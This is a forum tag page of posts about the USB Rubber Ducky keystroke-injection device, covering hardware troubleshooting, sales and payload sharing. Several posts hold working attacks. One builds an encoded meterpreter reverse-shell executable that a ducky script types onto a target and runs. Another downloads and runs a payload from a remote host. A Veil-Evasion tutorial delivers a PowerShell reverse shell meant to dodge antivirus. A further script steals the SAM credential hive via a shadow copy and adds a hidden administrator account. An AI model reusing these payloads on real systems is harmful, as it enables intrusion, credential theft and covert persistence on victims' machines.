Showing results for tags 'ducky'.


  1. When I am trying to program my Rubber Ducky I get this message. "There was an error flashing, make sure your Ducky is in DFU mode." Can someone make a video of this? Also a video on setting up a Rubber Ducky. When I tried to plug in my USB to my computer I do not see anything, but a sign saying "Hello World" in .txt. By the way this is my first time in this forum. Thank You, To whomever can help me
  2. Hi, I'm looking for a second hand USB Rubber Ducky. I'm from Spain. If you have an unused spare ducky, let me know how much you want for it. Thanks, Tamasco
  3. Ok so let me preface this with an apology in case my google fu has failed me. I've had a ducky for about a week now and have to be able to flash new firmware to it. I know you have to push the button during insertion to enter dfu mode. I have tried on a mac, windows 10 VM, and a kali box and have to get it. Nothing even seems to see it... Is there a way to verify dfu mode? I'm hoping it's not a faulty pin. Any help is greatly appreciated!!
  4. Saw a talk online at DefCon where someone had created a proxy server setup inject a hook into the js files a bit like Beef in kali combined with SSL stripping and MITM to grab passwords etc and thought this may be able to be used with the ducky by plugging into a computer and it automatically setting up a connection to your proxy server! For example, in Windows 10 you could use Win-Key + I to open setting and start typing proxy and hit enter to open up the right page then using tab to scroll down, then use up key to turn proxy on and keep doing the and enter the correct setup for your server and then save it! This is just an idea not sure if it's been done or if it can be done quicker using command-line or PowerShell haven't really looked at it! May not be practical please comment any suggestions!! Thanks !
  5. So. I bought a USB Ducky with the hope that it would allow me to enable USB Debugging and set file transfer to MTP mode on my wife's broken Samsung Galaxy S6 with a broken screen, in order to get two years of family photos that she wasn't backing up off the now totally inaccessible phone. I have almost no coding experience (as in, I made a Geocities site in the 90s and learned some basic HTML, and that's it). So when I discovered that the code written by folks a few years back to do this hack to phones on Android 4 wouldn't work at all on Android 6, I gave up hope. For a minute. Then I decided I'd try it myself. I discovered, through trial and error, that this version of android doesn't accept rapid-fire input from a keyboard. A default delay of 300 was needed to prevent the phone from missing commands. If I had to guess, I'd say the Google people got wise and built this in to try to prevent this kind of attack. Still, the code below does work. It does three things: It enables developer mode, enables USB Debugging, and changes the USB behavior from Charging to MTP. If your USB behavior is already MTP, it'll change it to PTP, so edit that if you need to. Anyway, thought I'd share. It did work. Best of luck, especially to others who are having similar problems and hoping for an aquatic fowl based answer.

    DEFAULT_DELAY 300
    REM Enable Developer options and usb debugging on Android
    REM Author: SamR
    REM Tested on Galaxy S6
    REM Android Version 6.0.1
    REM To start at the home screen
    ESCAPE
    ESCAPE
    ESCAPE
    ESCAPE
    ALT ESCAPE
    DELAY 500
    REM To enter settings
    DOWN
    DOWN
    DOWN
    ENTER
    ENTER
    DELAY 500
    STRING s
    STRING e
    STRING t
    STRING t
    STRING i
    STRING n
    STRING g
    STRING s
    DELAY 500
    DOWN
    ENTER
    DELAY 500
    REM To Access About Device
    RIGHT
    RIGHT
    RIGHT
    RIGHT
    RIGHT
    RIGHT
    RIGHT
    RIGHT
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    REM To Enable Developer Options
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    ENTER
    ENTER
    ENTER
    ENTER
    ENTER
    ENTER
    DELAY 500
    REM To Enable USB Debugging
    ESCAPE
    UP
    ENTER
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    DELAY 500
    TAB
    ENTER
    REM Set To MTP
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    DOWN
    ENTER
    REM Return To Home
    ESCAPE
    ESCAPE
    ESCAPE
    ESCAPE

  6. Hello , is there any way to run a ducky script without a usb
  7. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING 
binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  8. Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!
  9. Guest

    Pineapple Kali Pi rev:2

    I originally made this device with a raspberry pi model b, wifipineapple mark 4 and the usb rubberducky. Now I am using the raspberry pi 2, wifi pineapple mark 5 and the usb rubberducky
  10. Hi all, So, without giving anything away that would end up with you behind iron bars with a lover called Frank, what kind of experiences have you had with the Rubber Ducky? In which scenarios have you found it to be invaluable? I ask through curiosity and for inspiration. I'm sure there are a few good stories out there. Thanks
  11. Hi, This is probably a silly question, but I couldn't find the answer anywhere. What is the item, on this image, second from the left? (this is the kit that comes with the USB Rubber Ducky Deluxe)
  12. Looking for a used Pineapple and Rubber Ducky combo but willing to purchase separately if the deal is good enough. DM me or post here with what you have for sale and total price shipped to FL.
  13. Greetings everyone, I'm not from the Hak5 team but I wanted to share my work. I've made a small command line tool that can convert any plain/text file into a ducky script. I didn't know if this type of tool already exists so I created mine.

    Tool capabilities:

    • Convert any plain/text file (no matter its size).
    • Append commands after each line.
    • More will come soon.

    Please note that this tool is "Open Source", you can download it from GitHub, it's written in Pascal (see link below). For the moment this tool can only be executed on Windows. If you want to run it on a Linux system you can still use Wine until a new version is released.

    Tool in action:

    1. Choose a plain/text file (no matter its extension):

        This file
        will be
        converted into
        a ducky script !

    2. Run the tool with the following parameters (DSC -i myfile.dat -a DELAY 100,ENTER)

    3. This file will be converted and the tool will create a new one (myfile.dat.dsc) with the following content:

        STRING This file
        DELAY 100
        ENTER
        STRING will be
        DELAY 100
        ENTER
        STRING converted into
        DELAY 100
        ENTER
        STRING a ducky script !
        DELAY 100
        ENTER

    This can be useful if you have a long script to write, like a VBScript or whatever. GitHub link: https://github.com/CDevCom/DuckyStringConverter Best regards, CDevCom.
  14. I have been trying to set up my Ducky to run an injection file. When I plug it in my PC a red light comes on and just stays there on the Ducky but does nothing. I thought that it may be the format of the SD Card so have reformatted it using Fat32 and installed new Inject.bin files I have downloaded from this forum so I know they should work. Any ideas on what could be wrong or how I could fix it? Thanks,
  15. I've pulled together a plugin for Rockbox (http://rockbox.org) that can quack like a duck: http://gerrit.rockbox.org/r/1212 It also extends the scripting language, adding variables and flow control. However, it has one major limitation: speed. It can only send about 100 keys/second, which is only 20% of the theoretical maximum achievable with USB. For those of you with supported MP3 players, I suggest that you try it and feel free to ask questions and give feedback!
  16. hak5Shop Re-Stocking: Pineapples, Rubber Ducky's, LAN Turtles? :-| I've had 3 items on my geek wish list to get around to buying from hak5, a new Pineapple in any kit, a couple Rubber Ducky dongles, and a couple turtles. Now my luck is ALL say out of stock on the Hak5 Store. Thank goodness the Yard Stick is in stock for now because that was another item along with a backup Alfa. I'm sure I could probably find a used one but I would really prefer buying it from the Hak5 store. Being stupid I thought these were Hak5 items planned on continuing to sell and when initially seeing them I saw no mention of these being limited edition items. I actually planned on buying the whole field kit since it seemed a easier way to get mostly everything I wanted. Any idea or word on when the Pineapple, Rubber Ducky, Turtle Devices will be back in stock in the hak5 shop? I am really hoping it's a when and not if :-( I was even considering on offering some penetration testing services locally and these items were like a must have. Thanks in advance to anyone that has heard anything at all, seriously thank you. :-| -Dox
  17. Hello everybody, my USB Rubber Ducky arrives in a few days and I have another bunch of questions:

    1. It comes with a micro SD card, doesn't it? How much is its capability? (2, 4, 8 GB?)
    2. Does it come with pre-installed firmware?
    3. Does the Java version matter when building payloads?
    4. Does any noob-proof tutorial exist? you know

    Thanks in advance!
  18. Hi everyone, recently I got into using rubber ducky with android phones/tablets. The keyboard shortcut for accessing home (like pressing the home button) is Win key + ESC or Alt + ESC. If I plug a normal usb keyboard into the android device, both shortcuts work perfectly. If I try to simulate the same shortcut on rubber ducky, it does not work. Any idea what might be causing that? Ducky script IS executed (I put some STRING before the shortcut to test it and it was written down).

    DELAY 1000
    STRING Testing
    DELAY 400
    ALT ESC
    DELAY 400
    GUI ESC

    I have a feeling the ALT + ESC or WIN + ESC is executed too quickly and android ignores it, but it's a wild guess. I would appreciate any advice. Nikedp
  19. I created a payload on the duckytoolkit page, and put that on the sd card. Then run it through Ducky on the comp with second usb plugged in and nothing shows up on that usb. Please help.
  20. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the payload. (Less open ports on your machine, always a good thing.) Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky. The flip side is that this is a larger payload for Ducky to type out so you will have to plan accordingly. Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.) Install and setup Metasploit if you have not already. Install and setup Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit. Set up Ducky Encoder or whatever you choose to use to make your inject.bin. Payload Generation Start veil-evasion. Type "list" to see the list of available payloads. Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.) Set you LHOST and LPORT the same as you would do setting up a payload in Metasploit. Type "generate". Enter the name you want for the payload. Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.) 
Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly. Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.) If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work. Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING: Create you inject.bin file and put it on your Ducky.Operation Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload) Plug the Ducky into your target machine and away you go. The Command Shell window will automatically close once the Powershell script begins to execute. You may need to migrate to another x86 process to get full Meterpreter functions. A few notes If you try to run this sever times in quick succession on a target machine the subsequent tries may not go through as Powershell likes to hang on for a bit. Killing the initial process after migrating might fix this. I've tested this on the following:Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!) Windows 8.1 Pro x64 - Virtual Windows 10 Pro x64 Technical Preview - Virtual Windows Server 2008 R2 - Virtual Windows Server 2012 R2 - Virtual Enjoy.
  21. Is there any way to make a DuckSlurp without Powershell or the run command? I can't seem to get it to work on OSX
  22. I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!! DELAY 5000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = 
ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING Net User Admin tacos /ADD ENTER STRING Net LocalGroup Administrators Admin /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? 
{ $_.Label -eq 'DUCKY’ } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config-d04a8.ps1 ENTER DELAY 750 ALT F4 DELAY 1500 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1500 STRING m DELAY 1500 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  23. Hello... I saw that there is a 'Composite Duck 4x CAPS Trigger' for the Ducky. I have downloaded and compiled some of the Source Code but I didn't see any code for the x4 Caps trigger. I know midnitesnake is working with this, but I wondered if it was possible to get a copy of the source code for the x4 Caps Normally I would experiment with while loops and if statements, but I really don't want to damage the Ducky. It's not that I'm lazy, I just don't want to damage my little Ducky. Any help would be great. Thanks in advance.
  24. Hello Guys I need help with the a payload to get a reverse shell using the ruber ducky: I tried to use the powerducky script to get a reverse shell and no luck... I figured it out it was because my victim was an X64 and not a 386 ... So i went ahead and modified my powershell shell script to detect if my victim is X64... now when I run manually my malicious powershell script on my victim and i have a htpps listener in my attacking machine it works perfectly ... now the challenge i have is encoding my powershell script in base 64 so I can ultimately use in my inject.bin.... This is what I used to encode my powershell script: $Content = Get-Content -Path <path to my file> -Encoding Byte $Base64 = [system.Convert]::ToBase64String($Content) $Base64 | Out-File <path to encoded file> Also tried iconv in Linux: $Content = Get-Content -Path <path to my file> -Encoding Byte Encode="`cat $Content | iconv --to-code UTF-16LE | base64 -w 0`" and then dumping the value of variable encode... Whenever I tried to execute my payload in my victim (after loading the inject.bin in the ducky) the ducky starts to delivers the base 64 payload... however powershell truncates the payload while processing the base 64 string .. thus not getting a reverse shell.... After trying to run manually the powershell script... powershell -Enc <base64 string> i got the message in my victim that the string is not a valid base 64 string.... Anyone can point me on the command I need to run to convert my powershell script into a valid base 64 string so powershell can execute it? PS the reverse shell (reflective and web delivered) in powerducky have the same problem... whenever the inject.bin runs in the victim... the base 64 string is truncated in the victim and no reverse shell is sent to the attacking machine... Thanks
  25. Hello gentleman, Sorry in advance if this issue has been answered before, I was searching the forum for some information and didn't find something that clarifies my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can't submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quacking. In another thread I see a friend of the forum saying that solved using "GUI TAB" command, but over here this is not working. Some of you know how I can go ahead to solve this? Ty!